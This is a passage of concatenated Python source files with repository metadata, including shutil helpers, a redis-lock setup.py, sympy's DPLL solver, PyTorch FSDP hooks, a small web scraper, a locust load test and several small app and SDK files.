lines = int(os.environ['LINES'])
except (KeyError, ValueError):
lines = 0
# only query if necessary
if columns <= 0 or lines <= 0:
try:
size = os.get_terminal_size(sys.__stdout__.fileno())
except (AttributeError, ValueError, OSError):
# stdout is None, closed, detached, or not a terminal, or
# os.get_terminal_size() is unsupported
size = os.terminal_size(fallback)
if columns <= 0:
columns = size.columns
if lines <= 0:
lines = size.lines
return os.terminal_size((columns, lines))
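# Example: columns, lines = get_terminal_size()  # e.g. os.terminal_size(columns=80, lines=24)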
# Check that a given file can be accessed with the correct mode.
# Additionally check that `file` is not a directory, as on Windows
# directories pass the os.access check.
def _access_check(fn, mode):
return (os.path.exists(fn) and os.access(fn, mode)
and not os.path.isdir(fn))
def which(cmd, mode=os.F_OK | os.X_OK, path=None):
"""Given a command, mode, and a PATH string, return the path which
conforms to the given mode on the PATH, or None if there is no such
file.
`mode` defaults to os.F_OK | os.X_OK. `path` defaults to the result
of os.environ.get("PATH"), or can be overridden with a custom search
path.
"""
# If we're given a path with a directory part, look it up directly rather
# than referring to PATH directories. This includes checking relative to the
# current directory, e.g. ./script
if os.path.dirname(cmd):
if _access_check(cmd, mode):
return cmd
return None
use_bytes = isinstance(cmd, bytes)
if path is None:
path = os.environ.get("PATH", None)
if path is None:
try:
path = os.confstr("CS_PATH")
except (AttributeError, ValueError):
# os.confstr() or CS_PATH is not available
path = os.defpath
# bpo-35755: Don't use os.defpath if the PATH environment variable is
# set to an empty string
# PATH='' doesn't match, whereas PATH=':' looks in the current directory
if not path:
return None
if use_bytes:
path = os.fsencode(path)
path = path.split(os.fsencode(os.pathsep))
else:
path = os.fsdecode(path)
path = path.split(os.pathsep)
if sys.platform == "win32":
# The current directory takes precedence on Windows.
curdir = os.curdir
if use_bytes:
curdir = os.fsencode(curdir)
if curdir not in path:
path.insert(0, curdir)
# PATHEXT is necessary to check on Windows.
pathext_source = os.getenv("PATHEXT") or _WIN_DEFAULT_PATHEXT
pathext = [ext for ext in pathext_source.split(os.pathsep) if ext]
if use_bytes:
pathext = [os.fsencode(ext) for ext in pathext]
# See if the given file matches any of the expected path extensions.
# This will allow us to short circuit when given "python.exe".
# If it does match, only test that one, otherwise we have to try
# others.
if any(cmd.lower().endswith(ext.lower()) for ext in pathext):
files = [cmd]
else:
files = [cmd + ext for ext in pathext]
else:
# On other platforms you don't have things like PATHEXT to tell you
# what file suffixes are executable, so just pass on cmd as-is.
files = [cmd]
seen = set()
for dir in path:
normdir = os.path.normcase(dir)
        if normdir not in seen:
seen.add(normdir)
for thefile in files:
name = os.path.join(dir, thefile)
if _access_check(name, mode):
return name
return None
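# Example (illustrative): which('python') returns e.g. '/usr/bin/python' on a
# typical POSIX system, or None when no matching executable is found on PATH.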
| [
"[email protected]"
] | |
dc6194d9f9bf211787a355e6de94714e28514b5e | 6b63845777e94a06ebd4c728fee3fb3127d97033 | /setup.py | a32d9928d614164775df821d7305e5b6c3d84670 | [
"BSD-2-Clause"
] | permissive | mstaniszczak/python-redis-lock | 86c517a6d8b825ac767c8f6cd06f59519e0bf973 | 5cfa2f48cb06940355fb7776b16742b32c779571 | refs/heads/master | 2020-07-26T08:13:31.863248 | 2019-11-18T14:45:35 | 2019-11-18T14:45:35 | 208,586,940 | 0 | 0 | BSD-2-Clause | 2019-09-15T11:56:11 | 2019-09-15T11:56:10 | null | UTF-8 | Python | false | false | 2,945 | py | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
from __future__ import absolute_import
from __future__ import print_function
import io
import re
from glob import glob
from os.path import basename
from os.path import dirname
from os.path import join
from os.path import splitext
from setuptools import find_packages
from setuptools import setup
def read(*names, **kwargs):
with io.open(
join(dirname(__file__), *names),
encoding=kwargs.get('encoding', 'utf8')
) as fh:
return fh.read()
setup(
name='python-redis-lock',
version='3.3.1',
license='BSD 2-Clause License',
description='Lock context manager implemented via redis SETNX/BLPOP.',
long_description='%s\n%s' % (
re.compile('^.. start-badges.*^.. end-badges', re.M | re.S).sub('', read('README.rst')),
re.sub(':[a-z]+:`~?(.*?)`', r'``\1``', read('CHANGELOG.rst'))
),
author='Ionel Cristian Mărieș',
author_email='[email protected]',
url='https://github.com/ionelmc/python-redis-lock',
packages=find_packages('src'),
package_dir={'': 'src'},
py_modules=[splitext(basename(path))[0] for path in glob('src/*.py')],
include_package_data=True,
zip_safe=False,
classifiers=[
# complete classifier list: http://pypi.python.org/pypi?%3Aaction=list_classifiers
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: Unix',
'Operating System :: POSIX',
'Operating System :: Microsoft :: Windows',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy',
# uncomment if you test on these interpreters:
# 'Programming Language :: Python :: Implementation :: IronPython',
# 'Programming Language :: Python :: Implementation :: Jython',
# 'Programming Language :: Python :: Implementation :: Stackless',
'Topic :: Utilities',
],
project_urls={
'Documentation': 'https://python-redis-lock.readthedocs.io/',
'Changelog': 'https://python-redis-lock.readthedocs.io/en/latest/changelog.html',
'Issue Tracker': 'https://github.com/ionelmc/python-redis-lock/issues',
},
keywords=[
# eg: 'keyword1', 'keyword2', 'keyword3',
],
python_requires='>=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*',
install_requires=[
'redis>=2.10.0',
],
extras_require={
'django': [
'django-redis>=3.8.0',
]
}
)
| [
"[email protected]"
] | |
1934058aa2a961fccfeb79e210fbfa47f3df6f84 | 67cb31c6ac800dd8a3b6f9cfde21bf619871d0de | /two-sum-closest.py | 7523709d919495e37dda24deade2815c905528a7 | [] | no_license | onestarshang/leetcode_onestar | 93a5fbafaa49bb7f186eafdee5accc031c8893db | 2d6f1235b0ce311a0a2e46f157521430f17140e1 | refs/heads/master | 2021-01-19T20:30:49.169149 | 2017-06-16T05:12:58 | 2017-06-16T05:12:58 | 88,514,095 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 817 | py | # coding=utf8
'''
Find two numbers whose sum is closest to the target.
nums = [-1, 2, 1, -4], target = 4.
The smallest difference from the target is 1.
'''
class Solution:
# @param {int[]} nums an integer array
# @param {int} target an integer
# @return {int} the difference between the sum and the target
def twoSumClosest(self, nums, target):
# Write your code here
        if not nums:
            return -1
        nums.sort()
        diff = float('inf')  # sys.maxint is Python 2 only; float('inf') works on 2 and 3
start, end = 0, len(nums) - 1
while start < end:
if nums[start] + nums[end] < target:
diff = min([diff, target - nums[start] - nums[end]])
start += 1
else:
diff = min([diff, nums[start] + nums[end] - target])
end -= 1
return diff
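# Example (illustrative): Solution().twoSumClosest([-1, 2, 1, -4], 4) returns 1,
# since 1 + 2 = 3 is the achievable sum closest to 4.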
| [
"[email protected]"
] | |
dbaee83d67af86e8bc68165648dfd407ad7f3b3f | 54ab0f79f5d68f4732ca7d205f72ecef99862303 | /torch/distributed/fsdp/_fsdp_extensions.py | 1f087f44b573970d1e27e823f8ddbd18f756a8ca | [
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"BSL-1.0",
"Apache-2.0",
"BSD-2-Clause"
] | permissive | csarofeen/pytorch | a9dd0f8ffa0642d72df2d5e109a8b4d9c2389cbc | e8557ec5e064608577f81e51ccfe7c36c917cb0f | refs/heads/devel | 2023-04-30T02:42:13.558738 | 2023-03-14T00:50:01 | 2023-03-14T00:50:01 | 88,071,101 | 35 | 10 | NOASSERTION | 2023-06-21T17:37:30 | 2017-04-12T16:02:31 | C++ | UTF-8 | Python | false | false | 3,174 | py | from abc import ABC, abstractmethod
from typing import Any, List, Optional, Tuple
import torch
import torch.distributed as dist
from torch.distributed._shard.sharded_tensor.api import ShardedTensor
from torch.distributed._shard.sharded_tensor.shard import Shard
from torch.distributed.fsdp._shard_utils import _create_chunk_sharded_tensor
class FSDPExtensions(ABC):
"""
This enables some customizable hooks to enable composability with tensor
parallelism. To activate these hooks, use :func:`_set_fsdp_extensions` to
set a custom :class:`FSDPExtensions` that implements the hooks.
"""
@abstractmethod
def pre_flatten_transform(
self,
tensor: torch.Tensor,
) -> Tuple[torch.Tensor, Optional[Any]]:
"""E.g. converting ``DistributedTensor`` to local tensor."""
...
@abstractmethod
def post_unflatten_transform(
self,
tensor: torch.Tensor,
param_extension: Any,
) -> torch.Tensor:
"""E.g. converting local tensor to ``DistributedTensor``."""
...
@abstractmethod
def chunk_tensor(
self,
tensor: torch.Tensor,
rank: int,
world_size: int,
num_devices_per_node: int,
pg: dist.ProcessGroup,
) -> torch.Tensor:
"""Shards a tensor to chunks and returns the local chunk."""
...
@abstractmethod
def pre_load_state_dict_transform(
self,
tensor: torch.Tensor,
) -> Tuple[torch.Tensor, List[Shard]]:
"""
This is to be called before loading a *sharded* model state dict and
should return the tensor and list of shards from which to load data.
"""
...
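# Illustrative wiring sketch (hypothetical subclass, not part of this module):
#   class MyTPExtensions(FSDPExtensions):
#       def pre_flatten_transform(self, tensor):
#           return tensor, None  # no-op placeholder
#       ...  # implement the remaining hooks likewise
#   _set_fsdp_extensions(MyTPExtensions())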
_extensions: Optional[FSDPExtensions] = None
def _set_fsdp_extensions(flattener: FSDPExtensions) -> None:
global _extensions
_extensions = flattener
def _ext_pre_flatten_transform(
tensor: torch.Tensor,
) -> Tuple[torch.Tensor, Optional[Any]]:
if _extensions is not None:
new_tensor, extension = _extensions.pre_flatten_transform(tensor)
if extension is not None:
return new_tensor, extension
return tensor, None
def _ext_post_unflatten_transform(
tensor: torch.Tensor,
param_extension: Any,
) -> torch.Tensor:
if _extensions is not None and param_extension is not None:
return _extensions.post_unflatten_transform(tensor, param_extension)
return tensor
def _ext_chunk_tensor(
tensor: torch.Tensor,
rank: int,
world_size: int,
num_devices_per_node: int,
pg: dist.ProcessGroup,
) -> torch.Tensor:
chunk_tensor_fn = (
_extensions.chunk_tensor
if _extensions is not None
else _create_chunk_sharded_tensor
)
return chunk_tensor_fn(
tensor,
rank,
world_size,
num_devices_per_node,
pg,
)
def _ext_pre_load_state_dict_transform(
tensor: torch.Tensor,
) -> Tuple[torch.Tensor, List[Shard]]:
if _extensions is not None:
return _extensions.pre_load_state_dict_transform(tensor)
assert type(tensor) is ShardedTensor
shards = tensor.local_shards()
return (tensor, shards)
| [
"[email protected]"
] | |
3cf3c1f1d35bc706b4bad88d510bd47402af2346 | c487885e2b43f1dbaa8b06a6ad379550a6d8de16 | /work/022-web-crawl/program.py | 830209341c6466bf3b46af269bdcfc7aa8d367bb | [] | no_license | tbrlpld/100daysofweb-with-python-course | 3395a9d055e7e0d9b04785a48fe7dbd5e8d3a080 | 6b80c01a33d144107fe1bebe402f22cf23fc5408 | refs/heads/master | 2023-01-24T10:57:17.308107 | 2020-09-07T01:02:57 | 2020-09-07T01:02:57 | 215,710,767 | 2 | 0 | null | 2023-01-05T14:54:23 | 2019-10-17T05:34:23 | JavaScript | UTF-8 | Python | false | false | 1,050 | py | import requests
import bs4
from colorama import Fore
def get_html(episode_number: int) -> str:
print(Fore.YELLOW + f"Getting HTML for episode {episode_number}", flush=True)
url = f'https://talkpython.fm/{episode_number}'
resp = requests.get(url)
resp.raise_for_status()
return resp.text
def get_title(html: str, episode_number: int) -> str:
print(Fore.CYAN + f"Getting TITLE for episode {episode_number}", flush=True)
soup = bs4.BeautifulSoup(html, 'html.parser')
header = soup.select_one('h1')
if not header:
return "MISSING"
return header.text.strip()
def get_title_range():
# Please keep this range pretty small to not DDoS my site. ;)
lower_episode_number = 150
higher_episode_number = 170
for n in range(lower_episode_number, higher_episode_number):
html = get_html(n)
title = get_title(html, n)
print(Fore.WHITE + f"Title found: {title}", flush=True)
def main():
get_title_range()
print("Done.")
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
f6719e445232e1c84992d697f3fcc76afaf4c267 | 7e96ba20c25c6fb56af6ccd36b3b6d68df6a081c | /Kyle_Marienthal/DJANGO/wishlist/apps/wish_app/urls.py | d928425723734900ca75a11317fa753b0ac948ee | [] | no_license | CodingDojoDallas/python_september_2017 | 9d8cd74131a809bc6b13b7f465594cf8b1e2fd75 | f9f2f7b39bf9c4fceda3df5dc7424164aa5d5df5 | refs/heads/master | 2021-01-23T08:52:22.899994 | 2017-10-30T17:00:55 | 2017-10-30T17:00:55 | 102,558,291 | 2 | 14 | null | 2018-01-13T05:28:34 | 2017-09-06T03:28:38 | Python | UTF-8 | Python | false | false | 557 | py | from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^dashboard$', views.dashboard, name='dashboard'),
url(r'^wish_item$', views.wish_item, name='wish_item'),
url(r'^create$', views.create_item, name='create_item'),
url(r'^show_wish/(?P<id>\d+)$', views.show_wish, name='show_wish'),
url(r'^delete_wish/(?P<id>\d+)$', views.delete_wish, name='delete_wish'),
url(r'^remove_wish/(?P<id>\d+)$', views.remove_wish, name='remove_wish'),
url(r'^add_wish/(?P<id>\d+)$', views.add_wish, name='add_wish'),
]
| [
"[email protected]"
] | |
7bd4767c83974c3317ae920f888f7a5b4a9dff45 | d094ba0c8a9b1217fbf014aa79a283a49aabe88c | /env/lib/python3.6/site-packages/sympy/logic/algorithms/dpll.py | 62041c20519eb86cbcd92273b4ee8d2ed89d4101 | [
"Apache-2.0"
] | permissive | Raniac/NEURO-LEARN | d9274e0baadd97bb02da54bdfcf6ca091fc1c703 | 3c3acc55de8ba741e673063378e6cbaf10b64c7a | refs/heads/master | 2022-12-25T23:46:54.922237 | 2020-09-06T03:15:14 | 2020-09-06T03:15:14 | 182,013,100 | 9 | 2 | Apache-2.0 | 2022-12-09T21:01:00 | 2019-04-18T03:57:00 | CSS | UTF-8 | Python | false | false | 9,253 | py | """Implementation of DPLL algorithm
Further improvements: eliminate calls to pl_true, implement branching rules,
efficient unit propagation.
References:
- http://en.wikipedia.org/wiki/DPLL_algorithm
- https://www.researchgate.net/publication/242384772_Implementations_of_the_DPLL_Algorithm
"""
from __future__ import print_function, division
from sympy.core.compatibility import range
from sympy import default_sort_key
from sympy.logic.boolalg import Or, Not, conjuncts, disjuncts, to_cnf, \
to_int_repr, _find_predicates
from sympy.logic.inference import pl_true, literal_symbol
def dpll_satisfiable(expr):
"""
Check satisfiability of a propositional sentence.
It returns a model rather than True when it succeeds
>>> from sympy.abc import A, B
>>> from sympy.logic.algorithms.dpll import dpll_satisfiable
>>> dpll_satisfiable(A & ~B)
{A: True, B: False}
>>> dpll_satisfiable(A & ~A)
False
"""
clauses = conjuncts(to_cnf(expr))
if False in clauses:
return False
symbols = sorted(_find_predicates(expr), key=default_sort_key)
symbols_int_repr = set(range(1, len(symbols) + 1))
clauses_int_repr = to_int_repr(clauses, symbols)
result = dpll_int_repr(clauses_int_repr, symbols_int_repr, {})
if not result:
return result
output = {}
for key in result:
output.update({symbols[key - 1]: result[key]})
return output
def dpll(clauses, symbols, model):
"""
Compute satisfiability in a partial model.
Clauses is an array of conjuncts.
>>> from sympy.abc import A, B, D
>>> from sympy.logic.algorithms.dpll import dpll
>>> dpll([A, B, D], [A, B], {D: False})
False
"""
# compute DP kernel
P, value = find_unit_clause(clauses, model)
while P:
model.update({P: value})
symbols.remove(P)
if not value:
P = ~P
clauses = unit_propagate(clauses, P)
P, value = find_unit_clause(clauses, model)
P, value = find_pure_symbol(symbols, clauses)
while P:
model.update({P: value})
symbols.remove(P)
if not value:
P = ~P
clauses = unit_propagate(clauses, P)
P, value = find_pure_symbol(symbols, clauses)
# end DP kernel
unknown_clauses = []
for c in clauses:
val = pl_true(c, model)
if val is False:
return False
if val is not True:
unknown_clauses.append(c)
if not unknown_clauses:
return model
if not clauses:
return model
P = symbols.pop()
model_copy = model.copy()
model.update({P: True})
model_copy.update({P: False})
symbols_copy = symbols[:]
return (dpll(unit_propagate(unknown_clauses, P), symbols, model) or
dpll(unit_propagate(unknown_clauses, Not(P)), symbols_copy, model_copy))
def dpll_int_repr(clauses, symbols, model):
"""
Compute satisfiability in a partial model.
Arguments are expected to be in integer representation
>>> from sympy.logic.algorithms.dpll import dpll_int_repr
>>> dpll_int_repr([{1}, {2}, {3}], {1, 2}, {3: False})
False
"""
# compute DP kernel
P, value = find_unit_clause_int_repr(clauses, model)
while P:
model.update({P: value})
symbols.remove(P)
if not value:
P = -P
clauses = unit_propagate_int_repr(clauses, P)
P, value = find_unit_clause_int_repr(clauses, model)
P, value = find_pure_symbol_int_repr(symbols, clauses)
while P:
model.update({P: value})
symbols.remove(P)
if not value:
P = -P
clauses = unit_propagate_int_repr(clauses, P)
P, value = find_pure_symbol_int_repr(symbols, clauses)
# end DP kernel
unknown_clauses = []
for c in clauses:
val = pl_true_int_repr(c, model)
if val is False:
return False
if val is not True:
unknown_clauses.append(c)
if not unknown_clauses:
return model
P = symbols.pop()
model_copy = model.copy()
model.update({P: True})
model_copy.update({P: False})
symbols_copy = symbols.copy()
return (dpll_int_repr(unit_propagate_int_repr(unknown_clauses, P), symbols, model) or
dpll_int_repr(unit_propagate_int_repr(unknown_clauses, -P), symbols_copy, model_copy))
### helper methods for DPLL
def pl_true_int_repr(clause, model={}):
"""
Lightweight version of pl_true.
Argument clause represents the set of args of an Or clause. This is used
inside dpll_int_repr, it is not meant to be used directly.
>>> from sympy.logic.algorithms.dpll import pl_true_int_repr
>>> pl_true_int_repr({1, 2}, {1: False})
>>> pl_true_int_repr({1, 2}, {1: False, 2: False})
False
"""
result = False
for lit in clause:
if lit < 0:
p = model.get(-lit)
if p is not None:
p = not p
else:
p = model.get(lit)
if p is True:
return True
elif p is None:
result = None
return result
def unit_propagate(clauses, symbol):
"""
Returns an equivalent set of clauses
If a set of clauses contains the unit clause l, the other clauses are
simplified by the application of the two following rules:
1. every clause containing l is removed
2. in every clause that contains ~l this literal is deleted
Arguments are expected to be in CNF.
>>> from sympy import symbols
>>> from sympy.abc import A, B, D
>>> from sympy.logic.algorithms.dpll import unit_propagate
>>> unit_propagate([A | B, D | ~B, B], B)
[D, B]
"""
output = []
for c in clauses:
if c.func != Or:
output.append(c)
continue
for arg in c.args:
if arg == ~symbol:
output.append(Or(*[x for x in c.args if x != ~symbol]))
break
if arg == symbol:
break
else:
output.append(c)
return output
def unit_propagate_int_repr(clauses, s):
"""
Same as unit_propagate, but arguments are expected to be in integer
representation
>>> from sympy.logic.algorithms.dpll import unit_propagate_int_repr
>>> unit_propagate_int_repr([{1, 2}, {3, -2}, {2}], 2)
[{3}]
"""
negated = {-s}
return [clause - negated for clause in clauses if s not in clause]
def find_pure_symbol(symbols, unknown_clauses):
"""
Find a symbol and its value if it appears only as a positive literal
(or only as a negative) in clauses.
>>> from sympy import symbols
>>> from sympy.abc import A, B, D
>>> from sympy.logic.algorithms.dpll import find_pure_symbol
>>> find_pure_symbol([A, B, D], [A|~B,~B|~D,D|A])
(A, True)
"""
for sym in symbols:
found_pos, found_neg = False, False
for c in unknown_clauses:
if not found_pos and sym in disjuncts(c):
found_pos = True
if not found_neg and Not(sym) in disjuncts(c):
found_neg = True
if found_pos != found_neg:
return sym, found_pos
return None, None
def find_pure_symbol_int_repr(symbols, unknown_clauses):
"""
Same as find_pure_symbol, but arguments are expected
to be in integer representation
>>> from sympy.logic.algorithms.dpll import find_pure_symbol_int_repr
>>> find_pure_symbol_int_repr({1,2,3},
... [{1, -2}, {-2, -3}, {3, 1}])
(1, True)
"""
all_symbols = set().union(*unknown_clauses)
found_pos = all_symbols.intersection(symbols)
found_neg = all_symbols.intersection([-s for s in symbols])
for p in found_pos:
if -p not in found_neg:
return p, True
for p in found_neg:
if -p not in found_pos:
return -p, False
return None, None
def find_unit_clause(clauses, model):
"""
A unit clause has only 1 variable that is not bound in the model.
>>> from sympy import symbols
>>> from sympy.abc import A, B, D
>>> from sympy.logic.algorithms.dpll import find_unit_clause
>>> find_unit_clause([A | B | D, B | ~D, A | ~B], {A:True})
(B, False)
"""
for clause in clauses:
num_not_in_model = 0
for literal in disjuncts(clause):
sym = literal_symbol(literal)
if sym not in model:
num_not_in_model += 1
P, value = sym, not isinstance(literal, Not)
if num_not_in_model == 1:
return P, value
return None, None
def find_unit_clause_int_repr(clauses, model):
"""
Same as find_unit_clause, but arguments are expected to be in
integer representation.
>>> from sympy.logic.algorithms.dpll import find_unit_clause_int_repr
>>> find_unit_clause_int_repr([{1, 2, 3},
... {2, -3}, {1, -2}], {1: True})
(2, False)
"""
bound = set(model) | set(-sym for sym in model)
for clause in clauses:
unbound = clause - bound
if len(unbound) == 1:
p = unbound.pop()
if p < 0:
return -p, False
else:
return p, True
return None, None
| [
"[email protected]"
] | |
68bd7d76d90c36e16e1c519cefc8671496e0247f | b29589f95734682663ae6cd40ab00eb0a94b6d87 | /longwave/lblnew_20160916/study__g1_threshold/n2o/conc_3.2e-07/band03a_wn_540_620/nv_200/dv_0.005/ng_3/g_ascending_k_descending/refPTs_P_1_T_250__P_500_T_250/ng_refs_1__2/ng_adju_0__0/getabsth_auto__auto/absth_dlogN_uniform__dlogN_uniform/klin_2.22e-20/atmpro_mls/wgt_k_1/wgt_0.9__0.5_0.95/wgt_flux_1/w_diffuse_1.8__1.66_1.8/option_compute_ktable_1/option_compute_btable_0/crd_d62b618/param.py | 1efa8ff08b38418af19888072c3fb5e9fe5cb613 | [] | no_license | qAp/offline_radiation_notebooks | 02c2b2414ef1410f235776001a668f7df0b9f1cf | 44fb62391c27e4e314ad68ae3e91f6111b3172c5 | refs/heads/master | 2020-04-15T14:31:34.675322 | 2019-07-08T04:45:54 | 2019-07-08T04:45:54 | 43,118,324 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 871 | py | DIR_FORTRAN = '/chia_cluster/home/jackyu/radiation/crd/LW/examples/separate_g_groups/study__lblnew_g1_threshold/n2o/conc_3.2e-07/band03a_wn_540_620/nv_200/dv_0.005/ng_3/g_ascending_k_descending/refPTs_P_1_T_250__P_500_T_250/ng_refs_1__2/ng_adju_0__0/getabsth_auto__auto/absth_dlogN_uniform__dlogN_uniform/klin_2.22e-20/atmpro_mls/wgt_k_1/wgt_0.9__0.5_0.95/wgt_flux_1/w_diffuse_1.8__1.66_1.8/option_compute_ktable_1/option_compute_btable_0/crd_d62b618'
PARAM = {'molecule': 'n2o', 'band': '3a', 'commitnumber': 'd62b618', 'vmin': 540, 'vmax': 620, 'dv': 0.005, 'nv': 200, 'ref_pts': [(1, 250), (500, 250)], 'ng_refs': [1, 2], 'ng_adju': [0, 0], 'klin': 2.22e-20, 'option_wgt_k': 1, 'wgt': [(0.9,), (0.5, 0.95)], 'w_diffuse': [(1.8,), (1.66, 1.8)], 'option_wgt_flux': 1, 'atmpro': 'mls', 'tsfc': 294, 'conc': 3.2e-07, 'option_compute_btable': 0, 'option_compute_ktable': 1} | [
"[email protected]"
] | |
2569b26ea00537888870b42898de01514eb98c50 | a873f3cd46a10ad879fc56d78e1f533d8bf486c0 | /vova_project/vova_resful/接口/loc3.py | 1ebd4430df919e0ff85e243af0f32555921ed583 | [] | no_license | shenhaiyu0923/resful | d0301b39363e6b3d3659f62fa4a9b2532ebcd225 | 1e66cae7d68fa231794776953cc1a5e999bf36c6 | refs/heads/master | 2021-07-08T20:46:57.300298 | 2021-06-01T08:17:27 | 2021-06-01T08:17:27 | 244,308,016 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,299 | py | from locust import HttpLocust, TaskSequence, task, TaskSet
from pprint import pprint
from random import randint
import os
'''
1. Implement basic login, print the response, and verify the script works.
2. Random multi-user login: build random data inside doLogin. (LoadRunner: parameterization; JMeter: parameterization)
3. Add the on_start initialization method: like a constructor, it runs only once per simulated user.
4. Add checkpoints (assertions):
   - set the catch_response parameter to True in the request call
   - call the success and failure methods to mark the result as passed or failed
'''
# Task class
# class TestLogin(TaskSet):  TaskSequence inherits from TaskSet
class TestLogin(TaskSequence):
    # Runs automatically for each user before its tasks start
def on_start(self):
        # The request body takes a dict, e.g. username=byhy&password=88888888
self.loginnData = [
{'username': 'byhy', 'password': '88888888'},
{'username': 'byhy1', 'password': '888888881'},]
print('------on_start-------')
@task
def doLogin(self):
        # Random number up to 1000, taken modulo len(self.loginnData) to pick a random index
ranIndex = randint(1,1000) % len(self.loginnData)
data = {
"username": "byhy",
"password": "88888888",
}
url = 'http://127.0.0.1:8001/api/mgr/signin'
        response = self.client.post(url, data=self.loginnData[ranIndex], catch_response=True)  # catch_response=True lets us mark success/failure ourselves
if '"ret": 0' in response.text:
response.success()
else:
response.failure(' Can not login!')
print(self.loginnData[ranIndex]['username'])
print(response.text)
class WebSite(HttpLocust):
task_set = TestLogin
min_wait = 1000
max_wait = 3000
if __name__ == "__main__":
os.system("locust -f loc3.py --web-host=127.0.0.1")
'''
class UserBehavior(TaskSequence):
@task(1)
def byhy(self):
data = {
"username": "byhy",
"password": "88888888",
}
url = 'http://127.0.0.1:8001/api/mgr/signin'
r = self.client.post(url, data=data)
pprint(r.json())
class WebsiteUser(HttpLocust):
task_set = UserBehavior
min_wait = 1000
max_wait = 3000
if __name__ == "__main__":
import os
os.system("locust -f loc3.py --web-host=127.0.0.1")
''' | [
"[email protected]"
] | |
96702d0e44ae4a9a31a61c1639af7cc8917fd069 | 7e72e16f43170749dada023624a88fd622727639 | /jdcloud_sdk/services/monitor/models/DescribeAlarmingRulesEnd.py | 05a8f48f0d26c1478fdc96f2918611bc48513a30 | [
"Apache-2.0"
] | permissive | jdcloud-demo/jdcloud-sdk-python | 4dc1e814217df16c5f60f5e4b3f8260b770f9d2b | fddc2af24031c597948b8b8091978ac7e01a2695 | refs/heads/master | 2020-07-11T18:19:59.688112 | 2019-08-23T05:55:18 | 2019-08-23T05:55:18 | 204,613,050 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,320 | py | # coding=utf8
# Copyright 2018 JDCLOUD.COM
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# NOTE: This class is auto generated by the jdcloud code generator program.
class DescribeAlarmingRulesEnd(object):
def __init__(self, alarmHistoryList=None, numberPages=None, numberRecords=None, pageNumber=None, pageSize=None):
"""
:param alarmHistoryList: (Optional) 未恢复的报警
:param numberPages: (Optional) 总页数
:param numberRecords: (Optional) 总记录数
:param pageNumber: (Optional) 当前页码
:param pageSize: (Optional) 分页大小
"""
self.alarmHistoryList = alarmHistoryList
self.numberPages = numberPages
self.numberRecords = numberRecords
self.pageNumber = pageNumber
self.pageSize = pageSize
| [
"[email protected]"
] | |
728e0e56dc869b0274f7b832fdc35d1ddddf9393 | 57da072d37d59f00301e7483fdee067a244f24ce | /autobots/spider/test.py | 16cdf605c823d2c3aa45aba5b337bb417a119592 | [] | no_license | KonroyZhu/auto_project | 47919879e5f4b78ef082e7e76be2c2bb958018d3 | c0f10e8ee24342ede402a5694a20d160322eb8c1 | refs/heads/master | 2021-03-30T21:17:46.470105 | 2018-03-10T09:41:44 | 2018-03-10T09:41:44 | 124,640,575 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 436 | py | from selenium import webdriver
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
url="https://www.baidu.com/"
# Configure PhantomJS once, with a custom user agent in the desired capabilities
dcap = dict(DesiredCapabilities.PHANTOMJS)
dcap["phantomjs.page.settings.userAgent"] = ("Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0")
driver = webdriver.PhantomJS(desired_capabilities=dcap)
driver.implicitly_wait(20)
driver.get(url=url) | [
"[email protected]"
] | |
cee42ce181f4e1b5dfe899aa01006622846891c3 | 1a6c2be5ff1a8364c97a1ede23c824b2579ecf79 | /tfx/tools/cli/kubeflow_v2/commands/run_test.py | 46bb0730fdc04d5a2c3f65c8b83d3ee5b7b8f0ea | [
"Apache-2.0"
] | permissive | 418sec/tfx | fa1a4690df2178e9c6bd24f97df0bbde7436df95 | df1529c91e52d442443eca5968ff33cf0a38dffa | refs/heads/master | 2023-04-18T12:25:38.098958 | 2021-04-28T16:11:00 | 2021-04-28T16:11:00 | 333,769,030 | 2 | 1 | Apache-2.0 | 2021-04-28T16:11:01 | 2021-01-28T13:35:14 | null | UTF-8 | Python | false | false | 1,587 | py | # Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for Kubeflow V2 run commands."""
# TODO(b/169094706): Add kokoro test coverage for this test.
import codecs
import locale
import os
import sys
from click import testing as click_testing
import mock
import tensorflow as tf
# Fake GCP project ID, API key, docker image tag and job name under test.
# _TEST_API_KEY = 'fake-api-key'
# _TEST_PROJECT_ID = 'fake-gcp-project'
# _TEST_IMAGE = 'gcr.io/fake-image:fake-tag'
# _TEST_JOB_NAME = 'taxi-pipeline-1'
# TODO(b/169094706): re-surrect the tests when the unified client becomes
# available.
class RunTest(tf.test.TestCase):
def setUp(self):
# Change the encoding for Click since Python 3 is configured to use ASCII as
# encoding for the environment.
super().setUp()
if codecs.lookup(locale.getpreferredencoding()).name == 'ascii':
os.environ['LANG'] = 'en_US.utf-8'
